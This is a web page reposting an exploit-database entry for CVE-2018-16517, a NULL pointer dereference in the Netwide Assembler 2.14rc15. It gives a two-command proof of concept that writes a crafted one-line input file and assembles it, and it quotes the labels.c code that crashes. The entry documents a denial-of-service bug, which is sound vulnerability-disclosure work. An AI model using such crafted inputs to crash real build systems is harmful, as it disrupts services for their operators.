netwide assembler (nasm) 2.14rc15 null pointer dereference (poc)

▸▸▸ Exploit & Vulnerability >>   dos exploit & multiple vulnerability




netwide assembler (nasm) 2.14rc15 null pointer dereference (poc) Code Code...
				
# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC) # Date: 2018-09-05 # Exploit Author: Fakhri Zulkifli # Vendor Homepage: https://www.nasm.us/ # Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D # Version: 2.14rc15 and earlier # Tested on: 2.14rc15 # CVE : CVE-2018-16517 asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file. PoC: 1. echo "equ push rax" > poc 2. nasm -f elf poc insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal(). [...] if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken /* there's a label here */ first = false; result->label = tokval.t_charptr; i = stdscan(NULL, &tokval); if (i == ':') { /* skip over the optional colon */ i = stdscan(NULL, &tokval); } else if (i == 0) { nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1, "label alone on a line without a colon might be in error"); } if (i != TOKEN_INSN || tokval.t_integer != I_EQU) { /* * FIXME: location.segment could be NO_SEG, in which case * it is possible we should be passing 'absolute.segment'. Look into this. * Work out whether that is *really* what we should be doing. * Generally fix things. I think this is right as it is, but * am still not certain. */ define_label(result->label, in_absolute ? absolute.segment : location.segment, location.offset, true); [...] static bool islocal(const char *l) { if (tasm_compatible_mode) { if (l[0] == '@' && l[1] == '@') return true; } return (l[0] == '.' && l[1] != '.'); <-- boom }

Netwide assembler (nasm) 2.14rc15 null pointer dereference (poc) Vulnerability / Exploit Source : Netwide assembler (nasm) 2.14rc15 null pointer dereference (poc)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.